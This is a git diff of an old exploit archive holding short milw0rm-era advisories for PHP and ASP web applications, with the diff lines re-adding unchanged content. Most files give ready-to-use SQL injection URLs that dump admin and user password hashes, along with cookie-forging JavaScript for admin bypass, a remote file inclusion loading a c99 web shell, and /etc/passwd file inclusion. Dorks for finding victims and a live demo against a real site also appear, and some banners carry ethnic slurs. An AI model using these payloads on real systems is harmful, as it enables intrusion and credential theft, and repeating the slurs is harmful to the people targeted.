@@ -1,68 +1,68 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : Drinks Website - -<<->> Demo site : www.easysitenetwork.com/sites/drinks/ - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - for admin inf0 :: - - >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+admin_login/* - - - for members inf0 :: - - >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+users/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x - - :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - -# 
milw0rm.com [2008-06-26] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : Drinks Website + +<<->> Demo site : www.easysitenetwork.com/sites/drinks/ + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + for admin inf0 :: + + >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+admin_login/* + + + for members inf0 :: + + >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+users/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x + + :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y + +<<->> InjEctOr5 TeaM + + +<<->> All muslims + +# 
milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5950.txt b/platforms/php/webapps/5950.txt
index d9a9236ae..768454ac4 100755
--- a/platforms/php/webapps/5950.txt
+++ b/platforms/php/webapps/5950.txt
@@ -1,68 +1,68 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : Cheats Website - -<<->> Demo site : www.easysitenetwork.com/sites/cheats - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - for admin inf0 :: - - >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/* - - - for members inf0 :: - - >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x - - :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - -# 
milw0rm.com [2008-06-26] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : Cheats Website + +<<->> Demo site : www.easysitenetwork.com/sites/cheats + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + for admin inf0 :: + + >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/* + + + for members inf0 :: + + >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x + + :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y + +<<->> InjEctOr5 TeaM + + +<<->> All muslims + 
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5954.txt b/platforms/php/webapps/5954.txt
index 723955154..0deab71d7 100755
--- a/platforms/php/webapps/5954.txt
+++ b/platforms/php/webapps/5954.txt
@@ -1,36 +1,36 @@ - #################################################################################################### - # # - # ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... # - ################################################################################################### - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(hadihadi) - -special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra - -& all virangar members & all hackerz - -greetz:to my best friend in the world hadi_aryaie2004 -& my lovely friend arash(imm02tal) -------- -DESCRIPTION: - -A+ PHP Scripts - News Management System, suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. - ---- -exploit: -javascript:document.cookie = "mobsuser=1; path=/"; document.cookie = "mobspass=1; path=/"; ------ -now you can get admin access and manage the cms ;) -------- -young iranian h4ck3rz - -# milw0rm.com [2008-06-26] + #################################################################################################### + # # + # ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... 
# + ################################################################################################### + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(hadihadi) + +special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra + +& all virangar members & all hackerz + +greetz:to my best friend in the world hadi_aryaie2004 +& my lovely friend arash(imm02tal) +------- +DESCRIPTION: + +A+ PHP Scripts - News Management System, suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. + +--- +exploit: +javascript:document.cookie = "mobsuser=1; path=/"; document.cookie = "mobspass=1; path=/"; +----- +now you can get admin access and manage the cms ;) +------- +young iranian h4ck3rz + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5955.txt b/platforms/php/webapps/5955.txt index f4b75e968..e190ad42f 100755 --- a/platforms/php/webapps/5955.txt +++ b/platforms/php/webapps/5955.txt 
@@ -1,44 +1,44 @@ -##################################################################### -# -# Orca - Interactive Forum Script Remote File Inclusion Vulnerability -# -##################################################################### -# -# Discovered by : Ciph3r -# -# -# MAIL : Ciph3r_blackhat@yahoo.com -# -# -# SP tanx4: Iranian hacker & Kurdish security TEAM -# -# sp TANX2: milw0rm.com & google.com & sourceforge.net -# -# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624 -# -# class : remote -# -# risk : high -# -# Dork : "Powered by Orca Interactive Forum Script" -# -####################################################################### -# -# C0de : -# -# -# require_once ($gConf['dir']['layouts'] . 'base/params.php'); -# -# -####################################################################### - - EXPLOIT : - - - - http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php? - - -####################################################################### - -# milw0rm.com [2008-06-26] +##################################################################### +# +# Orca - Interactive Forum Script Remote File Inclusion Vulnerability +# +##################################################################### +# +# Discovered by : Ciph3r +# +# +# MAIL : Ciph3r_blackhat@yahoo.com +# +# +# SP tanx4: Iranian hacker & Kurdish security TEAM +# +# sp TANX2: milw0rm.com & google.com & sourceforge.net +# +# CMS download : http://sourceforge.net/project/platformdownload.php?group_id=183624 +# +# class : remote +# +# risk : high +# +# Dork : "Powered by Orca Interactive Forum Script" +# +####################################################################### +# +# C0de : +# +# +# require_once ($gConf['dir']['layouts'] . 
'base/params.php'); +# +# +####################################################################### + + EXPLOIT : + + + + http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://127.0.0.1/c99.php? + + +####################################################################### + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5956.txt b/platforms/php/webapps/5956.txt index 7d4aa187d..000595003 100755 --- a/platforms/php/webapps/5956.txt +++ b/platforms/php/webapps/5956.txt @@ -1,15 +1,15 @@ -@~~===========================================~~@ -| Author => StAkeR ~ StAkeR@hotmail.it | -@~~===========================================~~@ -+ + -@~~===========================================~~@ -| Keller Web Admin <= Local File Inclusion | -@~~===========================================~~@ -| Public/index.php?action=../../etc/passwd%00 | -@~~===========================================~~@ -+ -@~~===============================================================~~@ -| http://mesh.dl.sourceforge.net/sourceforge/kwa/kwa_0_94_pro.zip | -@~~===============================================================~~@ - -# milw0rm.com [2008-06-26] +@~~===========================================~~@ +| Author => StAkeR ~ StAkeR@hotmail.it | +@~~===========================================~~@ ++ + +@~~===========================================~~@ +| Keller Web Admin <= Local File Inclusion | +@~~===========================================~~@ +| Public/index.php?action=../../etc/passwd%00 | +@~~===========================================~~@ ++ +@~~===============================================================~~@ +| http://mesh.dl.sourceforge.net/sourceforge/kwa/kwa_0_94_pro.zip | +@~~===============================================================~~@ + +# milw0rm.com [2008-06-26] diff --git a/platforms/php/webapps/5957.txt b/platforms/php/webapps/5957.txt index e65baa7c2..c32b54360 100755 --- a/platforms/php/webapps/5957.txt 
+++ b/platforms/php/webapps/5957.txt @@ -1,94 +1,94 @@ -=========================================================== - OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities -=========================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 27 June 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : OTManager CMS - VERSION : 24a Completo - VENDOR : http://www.otmanager.org/ - DOWNLOAD : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip -##################################################### - ---------------------------------------- - Vulnerable File [index.php?conteudo=] ---------------------------------------- - -@Line - - 76: if($_REQUEST['conteudo']==""){ - 77: require("Principal.php"); - 78: }else{ - 79: if(!file_exists($_REQUEST['conteudo'].".php")){ - 80: echo '
    404 URL Invalida

    Por Favor, Selecione o Conteudo no Menu ao Lado.
    '; - 81: }else{ - 82: require($_REQUEST['conteudo'].".php"); - 83: } - 84: } - - ---------- - Exploit ---------- - -##### - LFI -##### - -[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI] - - - This exploit will open boot.ini in system file: - -[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect - - You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. - -##### - XSS -##### - -[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS] - - -------------- - POC Exploit -------------- - -##### - LFI -##### - -[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00 - -##### - XSS -##### - -[+] http://192.168.24.25/otmanager/index.php?conteudo= - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-27] +=========================================================== + OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities +=========================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 27 June 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : OTManager CMS + VERSION : 24a Completo + VENDOR : http://www.otmanager.org/ + DOWNLOAD : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip +##################################################### + +--------------------------------------- + Vulnerable File [index.php?conteudo=] +--------------------------------------- + +@Line + + 76: if($_REQUEST['conteudo']==""){ + 77: require("Principal.php"); + 78: }else{ + 79: if(!file_exists($_REQUEST['conteudo'].".php")){ + 80: echo '
    404 URL Invalida

    Por Favor, Selecione o Conteudo no Menu ao Lado.
    '; + 81: }else{ + 82: require($_REQUEST['conteudo'].".php"); + 83: } + 84: } + + +--------- + Exploit +--------- + +##### + LFI +##### + +[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI] + + + This exploit will open boot.ini in system file: + +[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect + + You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. + +##### + XSS +##### + +[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS] + + +------------- + POC Exploit +------------- + +##### + LFI +##### + +[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00 + +##### + XSS +##### + +[+] http://192.168.24.25/otmanager/index.php?conteudo= + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-27] diff --git a/platforms/php/webapps/5958.txt b/platforms/php/webapps/5958.txt index 134e6fc07..66a968328 100755 --- a/platforms/php/webapps/5958.txt +++ b/platforms/php/webapps/5958.txt 
@@ -1,27 +1,27 @@ -> [+] Script Name : philboard v 1.14 Multiple Remote Exploits - -> |+| Team : InjEct0r5 - -> [+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ; - -> [+] Contact : blackbeard-sql[A.T]hotmail{.}fr ; - -> [+] Dork : Powered by v1.14 powered by philboard v1.14 - -> --//--> - -> [+] Expl0iT : - -> Remote SQL Injection : - -> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL] - -> Blind Way : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00 - -> Remote XSS Exploit : - -> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS] - -[XSS] --> - -# milw0rm.com [2008-06-27] +> [+] Script Name : philboard v 1.14 Multiple Remote Exploits + +> |+| Team : InjEct0r5 + +> [+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ; + +> [+] Contact : blackbeard-sql[A.T]hotmail{.}fr ; + +> [+] Dork : Powered by v1.14 powered by philboard v1.14 + +> --//--> + +> [+] Expl0iT : + +> Remote SQL Injection : + +> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL] + +> Blind Way : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00 + +> Remote XSS Exploit : + +> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS] + +[XSS] --> + +# milw0rm.com [2008-06-27] diff --git a/platforms/php/webapps/5959.txt b/platforms/php/webapps/5959.txt index 7b918c30d..c165d90e3 100755 --- a/platforms/php/webapps/5959.txt +++ b/platforms/php/webapps/5959.txt 
@@ -1,40 +1,40 @@ - ################################################################################### - # # - # ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::.... # - ################################################################################### - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(hadihadi) - -special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra - -& all virangar members & all hackerz - -greetz:to my best friend in the world hadi_aryaie2004 -& my lovely friend arash(imm02tal) -------- -DESCRIPTION: -OTManager CMS, suffers from insecure cookie handling, when a admin login is successfull the script creates -a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt -contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are -logged in as a legit admin. ---- -vuln code in /Admin/index.php: - -if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){ -header('Location: ADM_Pagina.php'); // redirect to admin area - ---- -exploit: -javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/"; ------ -now visit /Admin and you can get admin access and manage the cms ;) -------- -young iranian h4ck3rz - -# milw0rm.com [2008-06-27] + ################################################################################### + # # + # ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::.... 
# + ################################################################################### + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(hadihadi) + +special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra + +& all virangar members & all hackerz + +greetz:to my best friend in the world hadi_aryaie2004 +& my lovely friend arash(imm02tal) +------- +DESCRIPTION: +OTManager CMS, suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. +--- +vuln code in /Admin/index.php: + +if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){ +header('Location: ADM_Pagina.php'); // redirect to admin area + +--- +exploit: +javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/"; +----- +now visit /Admin and you can get admin access and manage the cms ;) +------- +young iranian h4ck3rz + +# milw0rm.com [2008-06-27] diff --git a/platforms/php/webapps/5960.txt b/platforms/php/webapps/5960.txt index 2e64ed89a..773bc9194 100755 --- a/platforms/php/webapps/5960.txt +++ b/platforms/php/webapps/5960.txt 
@@ -1,55 +1,55 @@ -######################################################################### -#################### Viva IslaM Viva IslaM ############################## -## -## Remote SQL Injection Vulnerability -## -## SePortal V2.4 ( poll.php poll_id ) ( staticpages.php sp_id ) -## -######################################################################### -######################################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM -## -## Email : SQL@Hotmail.it -## -## !! SYRIAN HaCkErS !! -######################## -######################## -## -## Script : SePortal V2.4 -## -## site : www.seportal.org -## -## Download : http://www.seportal.org/downloads.php?action=showfile&id=1 -## -######################## -######################## -## -## -(:: SQL ::)- -## -## www.site.com/ -## poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/* -## -## -## -(:: L!VE DEMO ::)- -## -## http://demo.seportal.org/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/* -## -## http://demo.seportal.org/staticpages.php?sp_id=1' << here maybe most registr ;) -## -####################### -####################### - - -####################################################################################################### -####################################################################################################### - - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-06-27] +######################################################################### +#################### Viva IslaM Viva IslaM ############################## +## +## Remote SQL Injection Vulnerability +## +## SePortal V2.4 ( poll.php poll_id ) ( staticpages.php sp_id ) +## +######################################################################### +######################################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM +## +## Email : SQL@Hotmail.it +## +## !! SYRIAN HaCkErS !! +######################## +######################## +## +## Script : SePortal V2.4 +## +## site : www.seportal.org +## +## Download : http://www.seportal.org/downloads.php?action=showfile&id=1 +## +######################## +######################## +## +## -(:: SQL ::)- +## +## www.site.com/ +## poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/* +## +## +## -(:: L!VE DEMO ::)- +## +## http://demo.seportal.org/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/* +## +## http://demo.seportal.org/staticpages.php?sp_id=1' << here maybe most registr ;) +## +####################### +####################### + + +####################################################################################################### +####################################################################################################### + + -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-06-27] diff --git a/platforms/php/webapps/5961.txt b/platforms/php/webapps/5961.txt index c434f2535..17d01fb57 100755 --- a/platforms/php/webapps/5961.txt +++ b/platforms/php/webapps/5961.txt 
@@ -1,33 +1,33 @@ -################################# -Php fusion "classifieds" SQL-injetion -################################# - -++++++++++++++++++++++++++++ -Author : boom3rang -contact : boomerang [at] knaqu-shqipe [dot] de -webpage : www.khg-crew.ws -++++++++++++++++++++++++++++ - - - -----> Remote SQL Injection <------ - - -[+] Dork: inurl:"classifieds.php?op=detail_adverts" - - -[+] Example: www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL] - - - -exploit: -www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users-- - - - -########################################## - greetz to: All my albanian brothers - =United State of Albania = -########################################## - -# milw0rm.com [2008-06-27] +################################# +Php fusion "classifieds" SQL-injetion +################################# + +++++++++++++++++++++++++++++ +Author : boom3rang +contact : boomerang [at] knaqu-shqipe [dot] de +webpage : www.khg-crew.ws +++++++++++++++++++++++++++++ + + + +----> Remote SQL Injection <------ + + +[+] Dork: inurl:"classifieds.php?op=detail_adverts" + + +[+] Example: www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL] + + + +exploit: +www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users-- + + + +########################################## + greetz to: All my albanian brothers + =United State of Albania = +########################################## + +# milw0rm.com [2008-06-27] diff --git a/platforms/php/webapps/5963.txt b/platforms/php/webapps/5963.txt index 1399e884b..0a06b7dda 100755 --- a/platforms/php/webapps/5963.txt +++ b/platforms/php/webapps/5963.txt 
@@ -1,24 +1,24 @@ -/---------------------------------------------------------------\ -\ / -/ Joomla Component jabode Remote SQL injection \ -\ / -\---------------------------------------------------------------/ - - -[*] Author : His0k4 [ALGERIAN HaCkEr] - -[*] Dork : inurl:com_jabode - -[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL} - -[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users-- - -[*] Funny note: You can change "taurus" to your sign for best results xd... - - ----------------------------------------------------------------------------- -[*] Greetings : All friends & muslims HaCkeRs... -[*] Greetings2: http://www.dz-secure.com - http://palcastle.org/cc - -# milw0rm.com [2008-06-28] +/---------------------------------------------------------------\ +\ / +/ Joomla Component jabode Remote SQL injection \ +\ / +\---------------------------------------------------------------/ + + +[*] Author : His0k4 [ALGERIAN HaCkEr] + +[*] Dork : inurl:com_jabode + +[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL} + +[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users-- + +[*] Funny note: You can change "taurus" to your sign for best results xd... + + +---------------------------------------------------------------------------- +[*] Greetings : All friends & muslims HaCkeRs... +[*] Greetings2: http://www.dz-secure.com + http://palcastle.org/cc + +# milw0rm.com [2008-06-28] diff --git a/platforms/php/webapps/5964.txt b/platforms/php/webapps/5964.txt index cfe832ba6..05e424523 100755 --- a/platforms/php/webapps/5964.txt +++ b/platforms/php/webapps/5964.txt 
